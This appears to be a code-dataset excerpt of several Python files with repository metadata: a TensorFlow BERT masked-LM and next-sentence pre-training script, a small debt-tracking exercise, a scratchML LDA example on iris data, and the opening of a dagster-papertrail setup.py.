  model_fn, which passes model.get_pooled_output()).
  """
  # Simple binary classification. Note that 0 is "next sentence" and 1 is
  # "random sentence". This weight matrix is not used after pre-training.
  with tf.variable_scope("cls/seq_relationship"):
    output_weights = tf.get_variable(
        "output_weights",
        shape=[2, bert_config.hidden_size],
        initializer=modeling.create_initializer(bert_config.initializer_range))
    output_bias = tf.get_variable(
        "output_bias", shape=[2], initializer=tf.zeros_initializer())

    logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
    logits = tf.nn.bias_add(logits, output_bias)
    log_probs = tf.nn.log_softmax(logits, axis=-1)
    labels = tf.reshape(labels, [-1])
    one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
    # Cross-entropy over the two classes, averaged over the batch.
    per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
    loss = tf.reduce_mean(per_example_loss)
    return (loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
  """Gathers the vectors at the specific positions over a minibatch."""
  # sequence_tensor is rank 3 (enforced by expected_rank=3); positions
  # holds per-example indices into the second (sequence) axis.
  batch_size, seq_length, width = modeling.get_shape_list(
      sequence_tensor, expected_rank=3)

  # Turn per-example positions into indices into the flattened
  # [batch * seq_length, width] tensor by adding a per-row offset.
  row_offsets = tf.reshape(
      tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
  flat_positions = tf.reshape(positions + row_offsets, [-1])
  flattened = tf.reshape(sequence_tensor, [batch_size * seq_length, width])
  return tf.gather(flattened, flat_positions)
def input_fn_builder(input_files,
                     max_seq_length,
                     max_predictions_per_seq,
                     is_training,
                     num_cpu_threads=4):
  """Creates an `input_fn` closure to be passed to TPUEstimator."""

  def input_fn(params):
    """The actual input function."""
    # TPUEstimator passes the per-host batch size through `params`.
    batch_size = params["batch_size"]

    # Fixed-length feature spec; lengths must match data generation
    # (see the max_seq_length / max_predictions_per_seq flag docs).
    name_to_features = {
        "input_ids":
            tf.FixedLenFeature([max_seq_length], tf.int64),
        "input_mask":
            tf.FixedLenFeature([max_seq_length], tf.int64),
        "segment_ids":
            tf.FixedLenFeature([max_seq_length], tf.int64),
        "masked_lm_positions":
            tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
        "masked_lm_ids":
            tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
        "masked_lm_weights":
            tf.FixedLenFeature([max_predictions_per_seq], tf.float32),
        "next_sentence_labels":
            tf.FixedLenFeature([1], tf.int64),
    }

    # For training, we want a lot of parallel reading and shuffling.
    # For eval, we want no shuffling and parallel reading doesn't matter.
    if is_training:
      d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
      d = d.repeat()
      d = d.shuffle(buffer_size=len(input_files))

      # `cycle_length` is the number of parallel files that get read.
      cycle_length = min(num_cpu_threads, len(input_files))

      # `sloppy` mode means that the interleaving is not exact. This adds
      # even more randomness to the training pipeline.
      d = d.apply(
          tf.contrib.data.parallel_interleave(
              tf.data.TFRecordDataset,
              sloppy=is_training,
              cycle_length=cycle_length))
      d = d.shuffle(buffer_size=100)
    else:
      d = tf.data.TFRecordDataset(input_files)
      # Since we evaluate for a fixed number of steps we don't want to
      # encounter out-of-range exceptions.
      d = d.repeat()

    # We must `drop_remainder` on training because the TPU requires fixed
    # size dimensions. For eval, we assume we are evaluating on the CPU or GPU
    # and we *don't* want to drop the remainder, otherwise we wont cover
    # every sample.
    d = d.apply(
        tf.contrib.data.map_and_batch(
            lambda record: _decode_record(record, name_to_features),
            batch_size=batch_size,
            num_parallel_batches=num_cpu_threads,
            drop_remainder=True))
    return d

  return input_fn
def _decode_record(record, name_to_features):
  """Decodes a serialized tf.Example record into a dict of feature tensors."""
  parsed = tf.parse_single_example(record, name_to_features)

  # tf.Example only supports tf.int64, but the TPU only supports tf.int32,
  # so downcast every integer feature.
  for key, tensor in list(parsed.items()):
    if tensor.dtype == tf.int64:
      tensor = tf.to_int32(tensor)
    parsed[key] = tensor

  return parsed
def main(_):
  """Entry point: build the (TPU)Estimator and run training and/or eval."""
  tf.logging.set_verbosity(tf.logging.INFO)

  if not FLAGS.do_train and not FLAGS.do_eval:
    raise ValueError("At least one of `do_train` or `do_eval` must be True.")

  bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)

  tf.gfile.MakeDirs(FLAGS.output_dir)

  # Expand the comma-separated glob patterns into a flat file list.
  input_files = []
  for input_pattern in FLAGS.input_file.split(","):
    input_files.extend(tf.gfile.Glob(input_pattern))

  tf.logging.info("*** Input Files ***")
  for input_file in input_files:
    tf.logging.info("  %s" % input_file)

  tpu_cluster_resolver = None
  if FLAGS.use_tpu and FLAGS.tpu_name:
    tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
        FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)

  is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
  run_config = tf.contrib.tpu.RunConfig(
      cluster=tpu_cluster_resolver,
      master=FLAGS.master,
      model_dir=FLAGS.output_dir,
      save_checkpoints_steps=FLAGS.save_checkpoints_steps,
      keep_checkpoint_max=20,
      tpu_config=tf.contrib.tpu.TPUConfig(
          iterations_per_loop=FLAGS.iterations_per_loop,
          num_shards=FLAGS.num_tpu_cores,
          per_host_input_for_training=is_per_host))

  model_fn = model_fn_builder(
      bert_config=bert_config,
      init_checkpoint=FLAGS.init_checkpoint,
      learning_rate=FLAGS.learning_rate,
      num_train_steps=FLAGS.num_train_steps,
      num_warmup_steps=FLAGS.num_warmup_steps,
      use_tpu=FLAGS.use_tpu,
      use_one_hot_embeddings=FLAGS.use_tpu)

  # If TPU is not available, this will fall back to normal Estimator on CPU
  # or GPU.
  estimator = tf.contrib.tpu.TPUEstimator(
      use_tpu=FLAGS.use_tpu,
      model_fn=model_fn,
      config=run_config,
      train_batch_size=FLAGS.train_batch_size,
      eval_batch_size=FLAGS.eval_batch_size)

  if FLAGS.do_train:
    tf.logging.info("***** Running training *****")
    tf.logging.info("  Batch size = %d", FLAGS.train_batch_size)
    train_input_fn = input_fn_builder(
        input_files=input_files,
        max_seq_length=FLAGS.max_seq_length,
        max_predictions_per_seq=FLAGS.max_predictions_per_seq,
        is_training=True)
    estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps)

  if FLAGS.do_eval:
    tf.logging.info("***** Running evaluation *****")
    tf.logging.info("  Batch size = %d", FLAGS.eval_batch_size)

    eval_input_fn = input_fn_builder(
        input_files=input_files,
        max_seq_length=FLAGS.max_seq_length,
        max_predictions_per_seq=FLAGS.max_predictions_per_seq,
        is_training=False)

    result = estimator.evaluate(
        input_fn=eval_input_fn, steps=FLAGS.max_eval_steps)

    # Write the eval metrics both to the log and to a results file.
    output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt")
    with tf.gfile.GFile(output_eval_file, "w") as writer:
      tf.logging.info("***** Eval results *****")
      for key in sorted(result.keys()):
        tf.logging.info("  %s = %s", key, str(result[key]))
        writer.write("%s = %s\n" % (key, str(result[key])))
if __name__ == "__main__":
  # These flags have no usable defaults, so require them before running.
  flags.mark_flag_as_required("input_file")
  flags.mark_flag_as_required("bert_config_file")
  flags.mark_flag_as_required("output_dir")
  tf.app.run()
| 37.961616
| 82
| 0.699164
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from retrograph.modeling import modeling_adapter as modeling
from retrograph.modeling import optimization_adapter as optimization
import tensorflow as tf
flags = tf.flags

FLAGS = flags.FLAGS

# Required parameters.
# NOTE(review): this duplicated copy of the flag block had been corrupted —
# the "flags.DEFINE_string(" call lines introducing "bert_config_file" and
# "init_checkpoint" were lost (the latter left only a dangling "ng(").
# Restored here from the intact copy of the same module so it parses again.
flags.DEFINE_string(
    "bert_config_file", None,
    "The config json file corresponding to the pre-trained BERT model. "
    "This specifies the model architecture.")

flags.DEFINE_string(
    "input_file", None,
    "Input TF example files (can be a glob or comma separated).")

flags.DEFINE_string(
    "output_dir", None,
    "The output directory where the model checkpoints will be written.")

# Other parameters.
flags.DEFINE_string(
    "init_checkpoint", None,
    "Initial checkpoint (usually from a pre-trained BERT model).")

flags.DEFINE_integer(
    "max_seq_length", 128,
    "The maximum total input sequence length after WordPiece tokenization. "
    "Sequences longer than this will be truncated, and sequences shorter "
    "than this will be padded. Must match data generation.")

flags.DEFINE_integer(
    "max_predictions_per_seq", 20,
    "Maximum number of masked LM predictions per sequence. "
    "Must match data generation.")

flags.DEFINE_bool("do_train", False, "Whether to run training.")

flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")

flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")

flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")

flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")

flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")

flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")

flags.DEFINE_integer("save_checkpoints_steps", 1000,
                     "How often to save the model checkpoint.")

flags.DEFINE_integer("iterations_per_loop", 1000,
                     "How many steps to make in each estimator call.")

flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")

flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")

# TPU-only options; read only when --use_tpu is set.
tf.flags.DEFINE_string(
    "tpu_name", None,
    "The Cloud TPU to use for training. This should be either the name "
    "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
    "url.")

tf.flags.DEFINE_string(
    "tpu_zone", None,
    "[Optional] GCE zone where the Cloud TPU is located in. If not "
    "specified, we will attempt to automatically detect the GCE project from "
    "metadata.")

tf.flags.DEFINE_string(
    "gcp_project", None,
    "[Optional] Project name for the Cloud TPU-enabled project. If not "
    "specified, we will attempt to automatically detect the GCE project from "
    "metadata.")

tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")

flags.DEFINE_integer(
    "num_tpu_cores", 8,
    "Only used if `use_tpu` is True. Total number of TPU cores to use.")
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
                     num_train_steps, num_warmup_steps, use_tpu,
                     use_one_hot_embeddings):
  """Returns a `model_fn` closure for TPUEstimator.

  The returned function builds the BERT pre-training graph (masked LM +
  next-sentence prediction) and produces a TPUEstimatorSpec for the
  TRAIN or EVAL mode. Other modes raise ValueError.
  """

  def model_fn(features, labels, mode, params):
    """The `model_fn` for TPUEstimator; `labels`/`params` are unused here."""
    tf.logging.info("*** Features ***")
    for name in sorted(features.keys()):
      tf.logging.info("  name = %s, shape = %s" % (name, features[name].shape))
    # Feature tensors produced by the pre-training input pipeline.
    input_ids = features["input_ids"]
    input_mask = features["input_mask"]
    segment_ids = features["segment_ids"]
    masked_lm_positions = features["masked_lm_positions"]
    masked_lm_ids = features["masked_lm_ids"]
    masked_lm_weights = features["masked_lm_weights"]
    next_sentence_labels = features["next_sentence_labels"]
    is_training = (mode == tf.estimator.ModeKeys.TRAIN)
    model = modeling.BertModel(
        config=bert_config,
        is_training=is_training,
        input_ids=input_ids,
        input_mask=input_mask,
        token_type_ids=segment_ids,
        use_one_hot_embeddings=use_one_hot_embeddings)
    # Masked-LM head reuses the embedding table as the output projection.
    (masked_lm_loss,
     masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
         bert_config, model.get_sequence_output(), model.get_embedding_table(),
         masked_lm_positions, masked_lm_ids, masked_lm_weights)
    (next_sentence_loss, next_sentence_example_loss,
     next_sentence_log_probs) = get_next_sentence_output(
         bert_config, model.get_pooled_output(), next_sentence_labels)
    # The pre-training objective is the sum of the two head losses.
    total_loss = masked_lm_loss + next_sentence_loss
    tvars = tf.trainable_variables()
    initialized_variable_names = {}
    scaffold_fn = None
    if init_checkpoint:
      # Warm-start from an existing checkpoint (e.g. a released BERT model).
      (assignment_map, initialized_variable_names
      ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
      if use_tpu:
        # On TPU the restore must happen inside a Scaffold factory.
        def tpu_scaffold():
          tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
          return tf.train.Scaffold()
        scaffold_fn = tpu_scaffold
      else:
        tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
    tf.logging.info("**** Trainable Variables ****")
    for var in tvars:
      init_string = ""
      if var.name in initialized_variable_names:
        init_string = ", *INIT_FROM_CKPT*"
      tf.logging.info("  name = %s, shape = %s%s", var.name, var.shape,
                      init_string)
    output_spec = None
    if mode == tf.estimator.ModeKeys.TRAIN:
      train_op = optimization.create_optimizer(
          total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
      output_spec = tf.contrib.tpu.TPUEstimatorSpec(
          mode=mode,
          loss=total_loss,
          train_op=train_op,
          scaffold_fn=scaffold_fn)
    elif mode == tf.estimator.ModeKeys.EVAL:
      def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
                    masked_lm_weights, next_sentence_example_loss,
                    next_sentence_log_probs, next_sentence_labels):
        """Computes the loss and accuracy of the model."""
        masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
                                         [-1, masked_lm_log_probs.shape[-1]])
        masked_lm_predictions = tf.argmax(
            masked_lm_log_probs, axis=-1, output_type=tf.int32)
        masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
        masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
        masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
        # `masked_lm_weights` zeroes out padded prediction slots.
        masked_lm_accuracy = tf.metrics.accuracy(
            labels=masked_lm_ids,
            predictions=masked_lm_predictions,
            weights=masked_lm_weights)
        masked_lm_mean_loss = tf.metrics.mean(
            values=masked_lm_example_loss, weights=masked_lm_weights)
        next_sentence_log_probs = tf.reshape(
            next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
        next_sentence_predictions = tf.argmax(
            next_sentence_log_probs, axis=-1, output_type=tf.int32)
        next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
        next_sentence_accuracy = tf.metrics.accuracy(
            labels=next_sentence_labels, predictions=next_sentence_predictions)
        next_sentence_mean_loss = tf.metrics.mean(
            values=next_sentence_example_loss)
        return {
            "masked_lm_accuracy": masked_lm_accuracy,
            "masked_lm_loss": masked_lm_mean_loss,
            "next_sentence_accuracy": next_sentence_accuracy,
            "next_sentence_loss": next_sentence_mean_loss,
        }
      eval_metrics = (metric_fn, [
          masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
          masked_lm_weights, next_sentence_example_loss,
          next_sentence_log_probs, next_sentence_labels
      ])
      output_spec = tf.contrib.tpu.TPUEstimatorSpec(
          mode=mode,
          loss=total_loss,
          eval_metrics=eval_metrics,
          scaffold_fn=scaffold_fn)
    else:
      raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))
    return output_spec
  return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
                         label_ids, label_weights):
  """Gets loss and log probabilities for the masked-LM head.

  `output_weights` is the embedding table, reused as the output projection.
  Returns (scalar mean loss, per-prediction loss, log probs over the vocab).
  """
  # Select only the hidden vectors at the masked positions.
  input_tensor = gather_indexes(input_tensor, positions)
  with tf.variable_scope("cls/predictions"):
    # One extra non-linear transform before the output layer; this matrix is
    # only needed during pre-training.
    with tf.variable_scope("transform"):
      input_tensor = tf.layers.dense(
          input_tensor,
          units=bert_config.hidden_size,
          activation=modeling.get_activation(bert_config.hidden_act),
          kernel_initializer=modeling.create_initializer(
              bert_config.initializer_range))
      input_tensor = modeling.layer_norm(input_tensor)
    # Output weights are tied to the input embeddings; only a per-token
    # output bias is learned here.
    output_bias = tf.get_variable(
        "output_bias",
        shape=[bert_config.vocab_size],
        initializer=tf.zeros_initializer())
    logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
    logits = tf.nn.bias_add(logits, output_bias)
    log_probs = tf.nn.log_softmax(logits, axis=-1)
    label_ids = tf.reshape(label_ids, [-1])
    label_weights = tf.reshape(label_weights, [-1])
    one_hot_labels = tf.one_hot(
        label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
    # `label_weights` is used to mask out zero-padded prediction slots; the
    # small epsilon keeps the division defined when all weights are zero.
    per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
    numerator = tf.reduce_sum(label_weights * per_example_loss)
    denominator = tf.reduce_sum(label_weights) + 1e-5
    loss = numerator / denominator
  return (loss, per_example_loss, log_probs)
def get_next_sentence_output(bert_config, input_tensor, labels):
  """Gets loss and log probabilities for the next-sentence head.

  A simple binary softmax classifier over the pooled output. Returns
  (scalar mean loss, per-example loss, log probs over the two classes).
  """
  with tf.variable_scope("cls/seq_relationship"):
    # Checkpoint variable names ("output_weights"/"output_bias") are fixed
    # by the string literals below, not by the Python identifiers.
    classifier_weights = tf.get_variable(
        "output_weights",
        shape=[2, bert_config.hidden_size],
        initializer=modeling.create_initializer(bert_config.initializer_range))
    classifier_bias = tf.get_variable(
        "output_bias", shape=[2], initializer=tf.zeros_initializer())

    logits = tf.nn.bias_add(
        tf.matmul(input_tensor, classifier_weights, transpose_b=True),
        classifier_bias)
    log_probs = tf.nn.log_softmax(logits, axis=-1)

    flat_labels = tf.reshape(labels, [-1])
    one_hot_targets = tf.one_hot(flat_labels, depth=2, dtype=tf.float32)
    per_example_loss = -tf.reduce_sum(one_hot_targets * log_probs, axis=-1)
    mean_loss = tf.reduce_mean(per_example_loss)
    return (mean_loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
  """Gathers the vectors at the given positions over a minibatch.

  Flattens the [batch, seq, width] tensor to [batch * seq, width] and
  converts per-row positions to flat indices before gathering.
  """
  batch_size, seq_length, width = modeling.get_shape_list(
      sequence_tensor, expected_rank=3)

  # Offset of the first element of each batch row in the flattened tensor.
  row_offsets = tf.reshape(
      tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
  flat_positions = tf.reshape(positions + row_offsets, [-1])
  flattened = tf.reshape(sequence_tensor, [batch_size * seq_length, width])
  return tf.gather(flattened, flat_positions)
def input_fn_builder(input_files,
                     max_seq_length,
                     max_predictions_per_seq,
                     is_training,
                     num_cpu_threads=4):
  """Creates an `input_fn` closure to be passed to TPUEstimator."""

  def input_fn(params):
    """The actual input function; `params["batch_size"]` is set by the TPU runner."""
    batch_size = params["batch_size"]
    # Fixed-length feature spec matching the pre-training TFRecord schema.
    name_to_features = {
        "input_ids":
            tf.FixedLenFeature([max_seq_length], tf.int64),
        "input_mask":
            tf.FixedLenFeature([max_seq_length], tf.int64),
        "segment_ids":
            tf.FixedLenFeature([max_seq_length], tf.int64),
        "masked_lm_positions":
            tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
        "masked_lm_ids":
            tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
        "masked_lm_weights":
            tf.FixedLenFeature([max_predictions_per_seq], tf.float32),
        "next_sentence_labels":
            tf.FixedLenFeature([1], tf.int64),
    }
    # Training: lots of parallel reading and shuffling.
    if is_training:
      d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
      d = d.repeat()
      d = d.shuffle(buffer_size=len(input_files))
      # `cycle_length` is the number of parallel files that get read.
      cycle_length = min(num_cpu_threads, len(input_files))
      # `sloppy` mode means that the interleaving is not exact. This adds
      # even more randomness to the training pipeline.
      d = d.apply(
          tf.contrib.data.parallel_interleave(
              tf.data.TFRecordDataset,
              sloppy=is_training,
              cycle_length=cycle_length))
      d = d.shuffle(buffer_size=100)
    else:
      d = tf.data.TFRecordDataset(input_files)
      # Since we evaluate for a fixed number of steps we don't want to
      # encounter out-of-range errors, so repeat; as a consequence we may
      # not see every sample exactly once.
      d = d.repeat()
    # `drop_remainder=True` keeps batch shapes static (required on TPU).
    d = d.apply(
        tf.contrib.data.map_and_batch(
            lambda record: _decode_record(record, name_to_features),
            batch_size=batch_size,
            num_parallel_batches=num_cpu_threads,
            drop_remainder=True))
    return d
  return input_fn
def _decode_record(record, name_to_features):
  """Decodes a single serialized record into a dict of feature tensors."""
  parsed = tf.parse_single_example(record, name_to_features)
  # tf.Example only supports tf.int64, but the TPU only supports tf.int32,
  # so downcast every integer feature; other dtypes pass through unchanged.
  return {
      name: tf.to_int32(tensor) if tensor.dtype == tf.int64 else tensor
      for name, tensor in parsed.items()
  }
def main(_):
  """Entry point: builds the TPUEstimator and runs training and/or eval."""
  tf.logging.set_verbosity(tf.logging.INFO)
  if not FLAGS.do_train and not FLAGS.do_eval:
    raise ValueError("At least one of `do_train` or `do_eval` must be True.")
  bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
  tf.gfile.MakeDirs(FLAGS.output_dir)
  # --input_file is a comma-separated list of glob patterns.
  input_files = []
  for input_pattern in FLAGS.input_file.split(","):
    input_files.extend(tf.gfile.Glob(input_pattern))
  tf.logging.info("*** Input Files ***")
  for input_file in input_files:
    tf.logging.info("  %s" % input_file)
  tpu_cluster_resolver = None
  if FLAGS.use_tpu and FLAGS.tpu_name:
    tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
        FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
  is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
  run_config = tf.contrib.tpu.RunConfig(
      cluster=tpu_cluster_resolver,
      master=FLAGS.master,
      model_dir=FLAGS.output_dir,
      save_checkpoints_steps=FLAGS.save_checkpoints_steps,
      keep_checkpoint_max=20,
      tpu_config=tf.contrib.tpu.TPUConfig(
          iterations_per_loop=FLAGS.iterations_per_loop,
          num_shards=FLAGS.num_tpu_cores,
          per_host_input_for_training=is_per_host))
  model_fn = model_fn_builder(
      bert_config=bert_config,
      init_checkpoint=FLAGS.init_checkpoint,
      learning_rate=FLAGS.learning_rate,
      num_train_steps=FLAGS.num_train_steps,
      num_warmup_steps=FLAGS.num_warmup_steps,
      use_tpu=FLAGS.use_tpu,
      use_one_hot_embeddings=FLAGS.use_tpu)
  # If TPU is not available, this will fall back to normal Estimator on CPU
  # or GPU.
  estimator = tf.contrib.tpu.TPUEstimator(
      use_tpu=FLAGS.use_tpu,
      model_fn=model_fn,
      config=run_config,
      train_batch_size=FLAGS.train_batch_size,
      eval_batch_size=FLAGS.eval_batch_size)
  if FLAGS.do_train:
    tf.logging.info("***** Running training *****")
    tf.logging.info("  Batch size = %d", FLAGS.train_batch_size)
    train_input_fn = input_fn_builder(
        input_files=input_files,
        max_seq_length=FLAGS.max_seq_length,
        max_predictions_per_seq=FLAGS.max_predictions_per_seq,
        is_training=True)
    estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps)
  if FLAGS.do_eval:
    tf.logging.info("***** Running evaluation *****")
    tf.logging.info("  Batch size = %d", FLAGS.eval_batch_size)
    eval_input_fn = input_fn_builder(
        input_files=input_files,
        max_seq_length=FLAGS.max_seq_length,
        max_predictions_per_seq=FLAGS.max_predictions_per_seq,
        is_training=False)
    result = estimator.evaluate(
        input_fn=eval_input_fn, steps=FLAGS.max_eval_steps)
    # Log metrics and also persist them next to the checkpoints.
    output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt")
    with tf.gfile.GFile(output_eval_file, "w") as writer:
      tf.logging.info("***** Eval results *****")
      for key in sorted(result.keys()):
        tf.logging.info("  %s = %s", key, str(result[key]))
        writer.write("%s = %s\n" % (key, str(result[key])))
if __name__ == "__main__":
  # These flags have no usable defaults and must be given on the command line.
  flags.mark_flag_as_required("input_file")
  flags.mark_flag_as_required("bert_config_file")
  flags.mark_flag_as_required("output_dir")
  tf.app.run()
| true
| true
|
f70505938a0336b31ecf199133d778d0e94de7ec
| 514
|
py
|
Python
|
set3/p3_4.py
|
Felpezs/IPL_2021
|
eaef2baec96f16c1486f4ec5af6eff097f81fcd2
|
[
"MIT"
] | 1
|
2021-07-08T19:28:06.000Z
|
2021-07-08T19:28:06.000Z
|
set3/p3_4.py
|
Felpezs/IPL_2021
|
eaef2baec96f16c1486f4ec5af6eff097f81fcd2
|
[
"MIT"
] | null | null | null |
set3/p3_4.py
|
Felpezs/IPL_2021
|
eaef2baec96f16c1486f4ec5af6eff097f81fcd2
|
[
"MIT"
] | null | null | null |
def lend_money(debts, person, amount):
    """Record that *person* now owes an additional *amount*.

    Each person maps to the list of individual loan amounts in ``debts``;
    a person not seen before gets a fresh one-element list.  The updated
    mapping is printed as user feedback (unchanged from the original).
    """
    # The original used 0 as the "missing" sentinel for a *list* value and
    # relied on `[] != 0` being truthy; defaulting to [] directly is both
    # correct and clearer.  Concatenation (not append) preserves the
    # original behaviour of binding a brand-new list on every call.
    debts[person] = debts.get(person, []) + [amount]
    print(debts)
def amount_owed_by(debts, person):
    """Return the total amount *person* owes (0 for an unknown person)."""
    return sum(debts.get(person, [0]))
def total_amount_owed(debts):
    """Return the grand total owed across every person in *debts*.

    Each value in *debts* is a list of individual loan amounts; a
    flatten-and-sum generator replaces the original hand-written nested
    accumulation loop.
    """
    return sum(sum(amounts) for amounts in debts.values())
| 21.416667
| 41
| 0.583658
|
def lend_money(debts, person, amount):
    """Append *amount* to *person*'s loan list and echo the whole mapping."""
    existing = debts.get(person, 0)
    if existing == 0:
        # First loan for this person.
        debts[person] = [amount]
    else:
        # Rebind a fresh concatenated list, as the original did.
        debts[person] = existing + [amount]
    print(debts)
def amount_owed_by(debts, person):
    """Total owed by *person*; an unknown person owes nothing."""
    loans = debts.get(person)
    if loans is None:
        return 0
    return sum(loans)
def total_amount_owed(debts):
    """Grand total of every recorded loan, across all people."""
    total = 0
    for loans in debts.values():
        total += sum(loans)
    return total
| true
| true
|
f705065a635806e4fe8266665d0d44bcb7dfdec4
| 914
|
py
|
Python
|
scratchML/examples/linear_discriminant_analysis.py
|
TimS-ml/Scratch-ML
|
0ea010e2b7ead5f98ba9a0db621cc7d7471e97af
|
[
"MIT"
] | 4
|
2021-09-18T23:52:10.000Z
|
2021-09-25T04:04:10.000Z
|
scratchML/examples/linear_discriminant_analysis.py
|
TimS-ml/My-ML-From-Scratch
|
0ea010e2b7ead5f98ba9a0db621cc7d7471e97af
|
[
"MIT"
] | null | null | null |
scratchML/examples/linear_discriminant_analysis.py
|
TimS-ml/My-ML-From-Scratch
|
0ea010e2b7ead5f98ba9a0db621cc7d7471e97af
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
from scratchML.supervised_learning import LDA
from scratchML.utils import calculate_covariance_matrix, accuracy_score
from scratchML.utils import normalize, standardize, train_test_split, Plot
from scratchML.unsupervised_learning import PCA
def main():
    """Fit scratchML's LDA on a two-class subset of iris and plot the result."""
    # Load the dataset
    data = datasets.load_iris()
    X = data.data
    y = data.target
    # Keep only classes 0 and 1 (three iris classes -> two-class problem)
    X = X[y != 2]
    y = y[y != 2]
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)
    # Fit and predict using LDA
    lda = LDA()
    lda.fit(X_train, y_train)
    y_pred = lda.predict(X_test)
    accuracy = accuracy_score(y_test, y_pred)
    print("Accuracy:", accuracy)
    # Reduce the test points to 2-D and plot them coloured by prediction
    Plot().plot_in_2d(X_test, y_pred, title="LDA", accuracy=accuracy)
if __name__ == "__main__":
    main()
| 24.052632
| 77
| 0.712254
|
from __future__ import print_function
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
from scratchML.supervised_learning import LDA
from scratchML.utils import calculate_covariance_matrix, accuracy_score
from scratchML.utils import normalize, standardize, train_test_split, Plot
from scratchML.unsupervised_learning import PCA
def main():
    """Run the LDA demo: load iris, keep two classes, fit, score, plot."""
    data = datasets.load_iris()
    X = data.data
    y = data.target
    # Drop class 2 so the problem is binary.
    X = X[y != 2]
    y = y[y != 2]
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)
    lda = LDA()
    lda.fit(X_train, y_train)
    y_pred = lda.predict(X_test)
    accuracy = accuracy_score(y_test, y_pred)
    print("Accuracy:", accuracy)
    # Visualise test predictions in two dimensions.
    Plot().plot_in_2d(X_test, y_pred, title="LDA", accuracy=accuracy)
if __name__ == "__main__":
    main()
| true
| true
|
f70506c4e20561258cf4dc497d8803a8bee3c74e
| 1,046
|
py
|
Python
|
python_modules/libraries/dagster-papertrail/setup.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 2
|
2021-06-21T17:50:26.000Z
|
2021-06-21T19:14:23.000Z
|
python_modules/libraries/dagster-papertrail/setup.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 7
|
2022-03-16T06:55:04.000Z
|
2022-03-18T07:03:25.000Z
|
python_modules/libraries/dagster-papertrail/setup.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 1
|
2021-08-18T17:21:57.000Z
|
2021-08-18T17:21:57.000Z
|
from setuptools import find_packages, setup
def get_version():
    """Read ``__version__`` out of dagster_papertrail/version.py.

    The module is executed in a scratch namespace rather than imported, so
    the package itself need not be importable at build time.
    """
    namespace = {}
    with open("dagster_papertrail/version.py") as handle:
        exec(handle.read(), namespace)  # pylint: disable=W0122
    return namespace["__version__"]
if __name__ == "__main__":
    setup(
        name="dagster-papertrail",
        # Version is single-sourced from dagster_papertrail/version.py.
        version=get_version(),
        author="Elementl",
        author_email="hello@elementl.com",
        license="Apache-2.0",
        description="Package for papertrail Dagster framework components.",
        url="https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-papertrail",
        classifiers=[
            "Programming Language :: Python :: 2.7",
            "Programming Language :: Python :: 3.6",
            "Programming Language :: Python :: 3.7",
